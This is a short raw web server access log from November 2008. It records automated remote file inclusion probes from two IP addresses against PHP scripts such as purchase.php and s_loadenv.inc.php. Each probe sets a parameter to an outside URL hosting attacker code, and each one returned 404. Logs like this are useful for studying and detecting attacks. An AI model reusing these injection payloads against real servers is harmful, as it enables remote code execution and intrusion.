83.222.4.51 - - [03/Nov/2008:09:27:52 -0600] "GET /logs/purchase.php?jamroom[jm_dir]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:09:27:52 -0600] "GET /purchase.php?jamroom[jm_dir]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
140.130.101.5 - - [03/Nov/2008:09:28:40 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
140.130.101.5 - - [03/Nov/2008:09:28:40 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
140.130.101.5 - - [03/Nov/2008:09:28:40 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
